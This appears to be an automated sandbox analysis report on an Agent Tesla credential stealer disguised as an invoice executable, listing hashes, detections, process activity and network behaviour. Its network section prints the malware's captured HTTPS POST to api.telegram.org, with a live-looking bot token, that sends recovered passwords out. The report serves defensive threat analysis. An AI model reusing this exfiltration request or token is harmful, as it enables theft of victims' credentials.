                                                          Minutes_of_15th_Session_of_PSC.pdf.exeGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PO-inv-CQV20(923_25af6cb37987c1b4fafb61129ddc3c7a259c196_dbe8db34_f6eb4cc2-0f7f-4d1f-88d3-66a87cf07164\Report.wer

                                                          Download File
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):1.0155096525248184
                                                          Encrypted:false
                                                          SSDEEP:192:qU3woh68AHs0UnUItQaWYsT+GzuiFpZ24lO8cLi:Oo5AHUnUlaDsSGzuiFpY4lO81
                                                          MD5:4BFD9F224B40E114C9B202B4364A38DD
                                                          SHA1:4DFBDBDBE70C4C3DF2839D06373F79E747033ACF
                                                          SHA-256:6CF50F72C56CECD502CFECE1FB85E02172A9C5507A580BC7099E258CAFAAC278
                                                          SHA-512:7EE3F963A1CAC4EE8664A855F9B3D39FA5D65A6248D432E9B8852FD612BB15FD9C36208A41DF9EC74EC597B469D85974F9D7B6C888C6D5C19B37114B39E6179E
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.5.9.6.5.8.6.7.8.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.5.9.7.3.0.5.5.4.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.e.b.4.c.c.2.-.0.f.7.f.-.4.d.1.f.-.8.8.d.3.-.6.6.a.8.7.c.f.0.7.1.6.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.4.b.4.0.7.7.-.8.3.6.6.-.4.6.4.6.-.8.1.a.b.-.9.d.5.5.2.f.9.9.7.0.d.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.P.O.-.i.n.v.-.C.Q.V.2.0.(.9.2.3.1.5.)...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.p.a.t.a.n.a.n.e.p.a.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.b.0.-.0.0.0.1.-.0.0.1.5.-.5.c.3.4.-.8.0.2.a.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.a.6.a.5.0.a.7.e.e.0.5.9.2.a.e.e.7.e.3.c.f.b.b.e.9.9.0.b.e.e.9.0.0.0.0.0.0.0.0.!.0.0.0.0.e.0.2.d.c.7.4.b.a.a.e.8.2.1.c.9.1.f.1.2.c.8.9.0.d.b.5.9.5.f.9.b.0.8.d.b.4.1.8.c.!.P.O.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERD8AB.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:Mini DuMP crash report, 16 streams, Fri Apr 26 05:39:56 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):422156
                                                          Entropy (8bit):3.302651852752115
                                                          Encrypted:false
                                                          SSDEEP:3072:QG+Lv+IY5lFE4GjW7foFZwcSYsAFtLW1CCqEQ23+v8KkNgF:R+z+I1u7f08jLqb23Q8t
                                                          MD5:9DABFE1720A1B3F1325E0BDBE94CA0DD
                                                          SHA1:694B73039328EF5F02A572949306CF058DA69E62
                                                          SHA-256:8FC1F066AEF3FC0A35E0D4FCC857CA12645469293E2D6EBB7440DC31CCD42DF7
                                                          SHA-512:B1B02E5474F896DEDF2FF8BCD31020F059E9CD595B9A2D1D9276801652D76877B1CD3571B97E182B2A9BF979B494BE8D598DD20F7B4A984D108BC40F720103C9
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... .......,>+f........................l...4.......$........................H..nz..........l.......8...........T............*..|F..........\8..........H:..............................................................................eJ.......:......Lw......................T...........*>+f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERDAA0.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8642
                                                          Entropy (8bit):3.7166346998819466
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJbBdjDKeN6Y2D+lVvgmfZCL3prt89bz7+fPgxm:R6lXJzWeN6YTlVgmf4Lgzifj
                                                          MD5:A419BF5E35585727C3FD586F30413A50
                                                          SHA1:B130AF49E3EF6BC972045D60E11D0270575D1DE3
                                                          SHA-256:48E858C2B702070876287033F5265CE3385DE9FD89B9F320BB6AB1CC28AE97C7
                                                          SHA-512:892B81F0489C1ED4F5F2AB2AD019ED4EC80D6780439B3D29E6B698C7730E2A389E9ED7628770E715FC39BED4235F9E46B03A9340994D0F731112ED38A943F30B
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.4.0.<./.P.i.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERDAD0.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4812
                                                          Entropy (8bit):4.552953523927031
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsfJg771I9rIWpW8VYAmn0Ym8M4Jw8yLqDFWIyq85lhxv/GgFSCjsid:uIjfBI7wh7VIBJwP/IGtGeSCjzd
                                                          MD5:5074B24B2DE461996395C73505D1B952
                                                          SHA1:C869936549499F07E672BE25E1AB234012EF25D2
                                                          SHA-256:A9CEEC00382A7D4BBE1BC2AC763D6E6D0CA1D1BBD679415ED2CAF7654741A918
                                                          SHA-512:478E92BDA330C74A648EC0B0F8F2C382710CF803DF132C1ED34A95A77999BFEC01FC5C21F6A493E1B921AB9E5DB099D78B407D49EFA51047B6C8A192E3D5B9EB
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296442" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                          Download File
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.469280831893493
                                                          Encrypted:false
                                                          SSDEEP:6144:BIzZfpi6ceLPx9skLmb0fHZWSP3aJG8nAgeiJRMMhA2zX4WABluuNvjDH5S:MZHtHZWOKnMM6bFp1j4
                                                          MD5:7F976650912F9473DFDD405669B08EC2
                                                          SHA1:A92858DAE348496707090CA20DD63B825C240B9E
                                                          SHA-256:F610FC7BB336C1F306BAC3678C724E176A38136B5010D9E6CC093C965D3478CF
                                                          SHA-512:6BC850B3E5FF814328CF81E4CBA5C78408CE9739068BBA79E7000E34F952F3C2BA6F981D55EE4E9DE56E4B52AAAB8B959B86AAECC99E72D4E5FF6B15FD304775
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...+.................................................................................................................................................................................................................................................................................................................................................R..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.590640443822455
                                                          TrID:
                                                          • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                          • Win64 Executable Console (202006/5) 47.64%
                                                          • Win64 Executable (generic) (12005/4) 2.83%
                                                          • Generic Win/DOS Executable (2004/3) 0.47%
                                                          • DOS Executable Generic (2002/1) 0.47%
                                                          File name:PO-inv-CQV20(92315).exe
                                                          File size:1'012'108 bytes
                                                          MD5:4e62c4b92779d99998cd908a0966bf7d
                                                          SHA1:e02dc74baae821c91f12c890db595f9b08db418c
                                                          SHA256:3c54f1e2d58d392a6bcd2e6c836d1479888e3c334b8e6f5511a65bc1506681fb
                                                          SHA512:b563249ab296c423529877328c34e90d8437247d4e43c6122eb9c9732af33008ccff6b820fca91c1620a7039744964cfd9114d9430bc81444df07682306a0d3c
                                                          SSDEEP:24576:4wj9VEAwjUNroBr4eL7Wvmnn30lasPZTJOsdKknLimo/agStPTn:VE4NUBrd7xn30lXPZTx7Gj5Gb
                                                          TLSH:8F25E061D61CDEABE42E4038D95345C0317AC349B3EA9E7E04CEA159A48335731BBE9F
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....k..........."...0.O................ ....@...... ..............................~.....`................................

                                                          File Icon

                                                          Icon Hash:a2a286bcb4c6721a

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x400000
                                                          Entrypoint Section:
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows cui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0xB06BE3BE [Wed Oct 17 15:31:10 2063 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:

                                                          Entrypoint Preview

                                                          Instruction
                                                          dec ebp
                                                          pop edx
                                                          nop
                                                          add byte ptr [ebx], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax+eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x191ca.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x4f08e0x38.text
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x4d14f0x4d20074eb8fd652fa23fc8681b68fd3390bfeFalse0.5219180510534847data6.370516560098679IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x500000x191ca0x19200262705e5684d8496c974907e1f2ed161False0.21495063743781095data4.534060482385922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x5021c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7074468085106383
                                                          RT_ICON0x506840x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.4474671669793621
                                                          RT_ICON0x5172c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.32271784232365147
                                                          RT_ICON0x53cd40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.26771374586679264
                                                          RT_ICON0x57efc0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.1648970779604874
                                                          RT_GROUP_ICON0x687240x4cdata0.75
                                                          RT_VERSION0x687700x438data0.47685185185185186
                                                          RT_VERSION0x68ba80x438dataEnglishUnited States0.4777777777777778
                                                          RT_MANIFEST0x68fe00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          04/26/24-07:39:59.187251TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49699443192.168.2.6149.154.167.220

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Apr 26, 2024 07:39:58.267694950 CEST49699443192.168.2.6149.154.167.220
                                                          Apr 26, 2024 07:39:58.267718077 CEST44349699149.154.167.220192.168.2.6
                                                          Apr 26, 2024 07:39:58.267853975 CEST49699443192.168.2.6149.154.167.220
                                                          Apr 26, 2024 07:39:58.277611971 CEST49699443192.168.2.6149.154.167.220
                                                          Apr 26, 2024 07:39:58.277625084 CEST44349699149.154.167.220192.168.2.6
                                                          Apr 26, 2024 07:39:58.778444052 CEST44349699149.154.167.220192.168.2.6
                                                          Apr 26, 2024 07:39:58.778511047 CEST49699443192.168.2.6149.154.167.220
                                                          Apr 26, 2024 07:39:58.782738924 CEST49699443192.168.2.6149.154.167.220
                                                          Apr 26, 2024 07:39:58.782744884 CEST44349699149.154.167.220192.168.2.6
                                                          Apr 26, 2024 07:39:58.783071995 CEST44349699149.154.167.220192.168.2.6
                                                          Apr 26, 2024 07:39:58.826880932 CEST49699443192.168.2.6149.154.167.220
                                                          Apr 26, 2024 07:39:58.836642981 CEST49699443192.168.2.6149.154.167.220
                                                          Apr 26, 2024 07:39:58.884155035 CEST44349699149.154.167.220192.168.2.6
                                                          Apr 26, 2024 07:39:59.187115908 CEST49699443192.168.2.6149.154.167.220
                                                          Apr 26, 2024 07:39:59.187150955 CEST44349699149.154.167.220192.168.2.6
                                                          Apr 26, 2024 07:39:59.237672091 CEST44349699149.154.167.220192.168.2.6
                                                          Apr 26, 2024 07:39:59.280019999 CEST49699443192.168.2.6149.154.167.220
                                                          Apr 26, 2024 07:39:59.480964899 CEST44349699149.154.167.220192.168.2.6
                                                          Apr 26, 2024 07:39:59.481059074 CEST44349699149.154.167.220192.168.2.6
                                                          Apr 26, 2024 07:39:59.481255054 CEST49699443192.168.2.6149.154.167.220
                                                          Apr 26, 2024 07:39:59.487315893 CEST49699443192.168.2.6149.154.167.220

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Apr 26, 2024 07:39:58.134238005 CEST5728453192.168.2.61.1.1.1
                                                          Apr 26, 2024 07:39:58.259990931 CEST53572841.1.1.1192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Apr 26, 2024 07:39:58.134238005 CEST192.168.2.61.1.1.10x7150Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Apr 26, 2024 07:39:58.259990931 CEST1.1.1.1192.168.2.60x7150No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • api.telegram.org

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.649699149.154.167.2204435868C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-04-26 05:39:58 UTC260OUTPOST /bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendDocument HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=---------------------------8dc65c412473d6c
                                                          Host: api.telegram.org
                                                          Content-Length: 924
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          2024-04-26 05:39:59 UTC924OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 63 34 31 32 34 37 33 64 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 34 36 39 30 39 30 36 37 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 63 34 31 32 34 37 33 64 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 36 2f 32 30 32 34 20 30 37 3a 33 39 3a 35 37 0a 55 73 65 72
                                                          Data Ascii: -----------------------------8dc65c412473d6cContent-Disposition: form-data; name="chat_id"1469090678-----------------------------8dc65c412473d6cContent-Disposition: form-data; name="caption"New PW Recovered!Time: 04/26/2024 07:39:57User
                                                          2024-04-26 05:39:59 UTC25INHTTP/1.1 100 Continue
                                                          2024-04-26 05:39:59 UTC402INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.18.0
                                                          Date: Fri, 26 Apr 2024 05:39:59 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 56
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          {"ok":false,"error_code":400,"description":"Logged out"}


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:07:39:54
                                                          Start date:26/04/2024
                                                          Path:C:\Users\user\Desktop\PO-inv-CQV20(92315).exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\PO-inv-CQV20(92315).exe"
                                                          Imagebase:0x23344f60000
                                                          File size:1'012'108 bytes
                                                          MD5 hash:4E62C4B92779D99998CD908A0966BF7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:07:39:54
                                                          Start date:26/04/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:07:39:56
                                                          Start date:26/04/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                          Imagebase:0x700000
                                                          File size:47'584 bytes
                                                          MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3307185247.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:4
                                                          Start time:07:39:56
                                                          Start date:26/04/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                          Imagebase:0xa80000
                                                          File size:47'584 bytes
                                                          MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:07:39:56
                                                          Start date:26/04/2024
                                                          Path:C:\Windows\System32\WerFault.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 5040 -s 1080
                                                          Imagebase:0x7ff6a4ca0000
                                                          File size:570'736 bytes
                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:12.8%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:36
                                                            Total number of Limit Nodes:1
                                                            execution_graph 12525 7ffd34890a58 12526 7ffd34890a61 FreeConsole 12525->12526 12528 7ffd34890afe 12526->12528 12488 7ffd348997fd 12489 7ffd348997f7 12488->12489 12489->12488 12490 7ffd348a883b VirtualProtect 12489->12490 12491 7ffd348a8881 12490->12491 12492 7ffd34892e84 12493 7ffd34892e8d 12492->12493 12512 7ffd34892780 12493->12512 12495 7ffd34892ed3 12517 7ffd34890618 12495->12517 12498 7ffd34892780 LoadLibraryA 12499 7ffd34892f09 12498->12499 12500 7ffd34890618 LoadLibraryA 12499->12500 12501 7ffd34892f2b 12500->12501 12502 7ffd34892780 LoadLibraryA 12501->12502 12503 7ffd34892f38 12502->12503 12504 7ffd34890618 LoadLibraryA 12503->12504 12505 7ffd34892f77 12504->12505 12506 7ffd34892780 LoadLibraryA 12505->12506 12507 7ffd34892f84 12506->12507 12508 7ffd34890618 LoadLibraryA 12507->12508 12509 7ffd34892fa6 12508->12509 12510 7ffd34892780 LoadLibraryA 12509->12510 12511 7ffd34892fb3 12510->12511 12515 7ffd348927a0 12512->12515 12513 7ffd348927ef 12513->12495 12514 7ffd34892930 LoadLibraryA 12516 7ffd34892984 12514->12516 12515->12513 12515->12514 12516->12495 12518 7ffd34893000 12517->12518 12519 7ffd34892780 LoadLibraryA 12518->12519 12520 7ffd34892efc 12519->12520 12520->12498 12521 7ffd34892d84 12522 7ffd34892d8d VirtualProtect 12521->12522 12524 7ffd34892e51 12522->12524

                                                            Executed Functions

                                                            Function 00007FFD34970E29 Relevance: 4.6, Strings: 3, Instructions: 852COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
